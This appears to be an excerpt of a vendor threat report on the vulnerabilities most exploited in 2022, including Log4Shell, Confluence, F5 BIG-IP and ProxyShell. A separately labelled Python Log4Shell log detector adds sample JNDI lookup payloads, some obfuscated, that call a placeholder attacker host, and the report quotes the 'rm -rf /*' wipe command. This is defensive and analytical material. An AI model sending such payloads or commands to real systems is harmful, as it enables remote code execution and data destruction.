The following list of top vulnerabilities is based on data collected by the Check Point Intrusion Prevention System (IPS) sensor net and details some of the most popular and interesting attack techniques and exploits observed by CPR in the first half of 2022.
The critical remote code execution vulnerability was reported in May 2022 to Atlassian following its in-the-wild discovery as a zero-day. Affecting all supported versions of Confluence Server and Data Center, it was characterized as an Object-Graph Navigation Language (OGNL) injection vulnerability that could lead to execution of arbitrary code by an unauthenticated actor, resulting in the targeted system’s takeover. Although Atlassian released fixes in early June, since its discovery the vulnerability has become very popular, and was adopted by a wide range of threat actors to deploy backdoors, ransomware, cryptominers and botnets to vulnerable networks. Volexity, who first discovered the vulnerability, reported that China-affiliated attackers were leveraging this exploit on vulnerable servers to deploy web shells, as an initial foothold into targeted organizations. According to CPR, attacks relating to this vulnerability affected approximately 14% of organizations worldwide.
Apache Log4j is an open-source Java-based logging package provided by the Apache Software Foundation and is used by millions of Java-based applications worldwide to record activities. In late 2021, the Apache Foundation released an emergency Log4j version to address a critical flaw in the logging framework that enables threat actors to compromise a machine by simply sending it a string. Called ‘Log4Shell’, the vulnerability took the security community by storm, due to the magnitude of its influence – millions of companies, including Tesla, Amazon and Apple, use Log4j. Numerous attacks were observed, and during 2022 Log4Shell remained one of the most highly exploited vulnerabilities. The vulnerability’s simplicity and reach attracted both low-skilled and advanced threat groups. Iranian-aligned APT35 exploited Log4Shell to distribute a new and modular PowerShell toolkit, and China-based threat group Deep Panda used Log4Shell to exploit vulnerable VMware Horizon servers.
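As an added illustration of the defensive side of the Log4Shell paragraph (this is not code from the report), the following Python detector flags the lookup string in constructed web-server log lines; it also undoes the case-changing and default-value lookup obfuscations that public detection rules cover, so a split keyword reassembles before matching. The log line format and hostnames are assumed.

```python
import re

# Constructed sample log lines (not taken from the report) imitating what a
# web server might record when a Log4j lookup string arrives in a header.
# Hostnames are placeholders.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.invalid/a}"',
    '10.0.0.7 - - "GET /api HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://attacker.invalid/x}"',
    '10.0.0.3 - - "GET /health HTTP/1.1" 200 "curl/7.80"',
]

# ${lower:x} / ${upper:x} evaluate to x (case-changed) in Log4j lookups.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
# ${anything:-x} evaluates to the default value x when the lookup is undefined.
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
# The remote lookup that Log4Shell abuses.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize_lookups(text: str) -> str:
    """Rewrite innermost obfuscating lookups to their resulting value until
    nothing changes, so that a split 'jndi' keyword is reassembled."""
    prev = None
    while prev != text:
        prev = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text


def is_log4shell_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return bool(_JNDI.search(normalize_lookups(line)))


def find_probes(lines):
    """Return the subset of log lines that carry a Log4Shell lookup string."""
    return [line for line in lines if is_log4shell_probe(line)]


if __name__ == "__main__":
    for hit in find_probes(SAMPLE_LOG_LINES):
        print("Log4Shell probe:", hit)
```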
CVE-2022-1388 is a Remote Code Execution (RCE) vulnerability (9.8 CVSS score) initially published by F5 on May 4. The vulnerability affects the BIG-IP line of products; in less than a week, multiple threat actors began to massively exploit it to drop malicious payloads to thousands of exposed systems. By May 18, CISA published an additional alert, warning that PoC publications enabled “less sophisticated actors” to exploit the vulnerability.
Other attackers refrained from using unpatched F5 BIG-IP devices to gain their initial foothold in organizations, and instead chose a path of destruction, sending the notorious “rm -rf /*” command, which erased most of the data on vulnerable devices, including essential configuration data.
Many vulnerabilities discovered in 2017 maintained a strong presence throughout 2022, similar to their behavior in 2021. This is mostly due to popular flaws like the Apache Struts2 Remote Code Execution (CVE-2017-5638) which is used by botnets, or the PHPUnit remote code execution (CVE-2017-9841), often used to exploit vulnerable WordPress plugins. According to the chart above, vulnerabilities disclosed in 2021-2022 were only exploited in 9.8% of the attacks leveraging vulnerabilities observed by CPR. However, information collected by the Check Point Incident Response Team (CPIRT) and shared in the current report allows us to examine the age of vulnerabilities used in successful attacks – not only attack attempts prevented by Check Point products – and draw our conclusions.
According to CPIRT, the most common vulnerability observed in the first half of 2022, used in no fewer than 69% of the cases, is the ProxyShell vulnerability chain (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) disclosed in August 2021. This data point demonstrates that while attackers heavily exploit 4-5 year old vulnerabilities, successful attacks often rely on newly discovered flaws, probably before organizations have patched their vulnerable servers. The data also shows that older vulnerabilities are constantly exploited – most likely by low-skilled attackers and with a much lower success rate. These findings once again highlight the importance of timely system patching.